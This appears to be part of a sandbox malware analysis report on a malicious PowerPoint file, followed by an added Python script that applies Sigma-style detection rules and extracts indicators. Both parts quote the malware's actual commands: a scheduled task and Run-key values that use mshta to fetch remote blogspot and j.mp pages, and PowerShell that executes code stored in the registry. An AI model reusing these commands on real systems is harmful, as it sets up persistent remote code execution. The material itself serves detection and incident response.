Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki
Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
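The process tree earlier in the report and the Run-key entries above are exactly what the report's Sigma hits fire on: Microsoft Office Product Spawning Windows Shell (POWERPNT.EXE starting mshta.exe), MSHTA Spawning Windows Shell (mshta.exe starting powershell.exe and cmd.exe), Schedule script from internet via mshta (the schtasks /create line) and Powershell execute code from registry (the `((gp HKCU:\Software).meather)|IEX` command line, and the same string inside the Run values). The Python below is an added example written for this page, not the sandbox's code and not the actual Sigma rules: it re-implements that logic over lines copied from the report and pulls out the indicators a responder would act on (the j.mp and blogspot URLs, the Run value names, the task name, and the HKCU:\Software property names `meather` and `phuttalylo` that hold the PowerShell stage). The rule names, the parsing of the report's line format, and the extra powershell-spawns-MSBuild heuristic are my assumptions.

```python
"""Sigma-style triage of process-creation and autorun lines in the format this report uses."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed input: lines copied from the report's process tree and Boot Survival sections;
# the first (cmd.exe opening the deck) is a benign control that no rule should hit.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\BankSwiftCopyUSD95000.ppt'",
    r"Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\mshta.exe mshta http://1230948%1230948%1230948%1230948@j.mp/dbgghasdnasdjasgdakgsdhv",
    r"Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe' -noexit ((gp HKCU:\Software).meather)|IEX",
    r"Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')",
    r"Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
    r'Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).meather)|IEX"", 0 : window.close")',
    r'Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://backbones1234511a.blogspot.com/p/stback1.html"", 0 : window.close")',
    r'Source: C:\Windows\System32\mshta.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).phuttalylo)|IEX"", 0 : window.close")',
]

PROC_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<image>.+?\.exe)(?: (?P<cmdline>.*))?$", re.I)
REG_RE = re.compile(r"^Source: .+? Registry value created or modified: (?P<key>\S+) (?P<name>\S+)(?: (?P<data>.*))?$")
REG_CODE_RE = re.compile(r"\b(gp|Get-ItemProperty)\b.*\b(iex|Invoke-Expression)\b", re.I)
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def base(path):
    return PureWindowsPath(path.strip("'\"")).name.lower()


def parse(line):
    """One report line -> process or registry event dict (None for any other line type)."""
    line = line.replace(" Jump to behavior", "").strip()
    m = PROC_RE.match(line)
    if m:
        return {"kind": "process", "parent": m["parent"], "image": m["image"], "cmdline": m["cmdline"] or ""}
    m = REG_RE.match(line)
    if m:
        return {"kind": "registry", "key": m["key"], "name": m["name"], "data": m["data"] or ""}
    return None


# Rules named after the report's Sigma hits, plus one extra heuristic at the end.
def office_spawning_shell(ev):
    return ev["kind"] == "process" and base(ev["parent"]) in OFFICE and base(ev["image"]) in SHELLS


def mshta_spawning_shell(ev):
    return ev["kind"] == "process" and base(ev["parent"]) == "mshta.exe" and base(ev["image"]) in SHELLS - {"mshta.exe"}


def mshta_remote_or_inline(ev):
    # mshta handed a URL or a vbscript:/javascript: handler instead of a local .hta file
    return (ev["kind"] == "process" and base(ev["image"]) == "mshta.exe"
            and re.search(r"https?://|vbscript:|javascript:", ev["cmdline"], re.I) is not None)


def schtasks_mshta_from_internet(ev):
    if ev["kind"] != "process" or base(ev["image"]) != "schtasks.exe":
        return False
    c = ev["cmdline"].lower()
    return "/create" in c and "mshta" in c and "http" in c


def powershell_code_from_registry(ev):
    # ((gp HKCU:\Software).<name>)|IEX : the stage lives in a registry value, never on disk
    if ev["kind"] == "process":
        if base(ev["image"]) != "powershell.exe":
            return False
        text = ev["cmdline"]
    else:
        text = ev["data"]
        if "powershell" not in text.lower():
            return False
    return REG_CODE_RE.search(text) is not None


def run_key_mshta_inline(ev):
    return (ev["kind"] == "registry" and ev["key"].lower().endswith(r"\currentversion\run")
            and re.search(r"mshta\s+(vbscript:|javascript:|https?://)", ev["data"], re.I) is not None)


def powershell_spawning_msbuild(ev):
    # Not one of the report's Sigma hits: powershell.exe starting MSBuild.exe with no project
    # file on the command line, a common host for injected .NET payloads.
    return ev["kind"] == "process" and base(ev["parent"]) == "powershell.exe" and base(ev["image"]) == "msbuild.exe"


RULES = {f.__name__: f for f in (office_spawning_shell, mshta_spawning_shell, mshta_remote_or_inline,
                                  schtasks_mshta_from_internet, powershell_code_from_registry,
                                  run_key_mshta_inline, powershell_spawning_msbuild)}


def triage(lines):
    """Rule name -> 0-based indexes of the lines it fired on."""
    hits = defaultdict(list)
    for i, line in enumerate(lines):
        ev = parse(line)
        for name, rule in RULES.items():
            if ev and rule(ev):
                hits[name].append(i)
    return dict(hits)


def extract_iocs(lines):
    """URLs, registry-stored script names, Run value names and task names worth blocking."""
    text = "\n".join(lines)
    regs = [ev for ev in map(parse, lines) if ev and ev["kind"] == "registry"]
    return {
        "urls": sorted(set(re.findall(r"https?://[^\s\"']+", text))),
        "registry_code_props": sorted(set(re.findall(r"gp (HK[A-Z]+:\\[^\s)]+)\)\.(\w+)", text))),
        "run_values": sorted(ev["name"] for ev in regs),
        "task_names": sorted(set(re.findall(r"/tn\s+'*([^\s']+)", text, re.I))),
    }
```

`triage(SAMPLE_LINES)` returns one entry per rule with the line indexes it matched, and `extract_iocs(SAMPLE_LINES)` returns the three URLs, the two registry property names under HKCU:\Software, the Run value names and the task name. On a live host the same two registry properties are what to look for first: `(gp HKCU:\Software).meather` is the whole second stage, and deleting the Run values and the `lunkicharkhi` task without clearing those properties leaves the payload in place for the next launcher.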

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\mshta.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX (39 occurrences)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX (19 occurrences)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
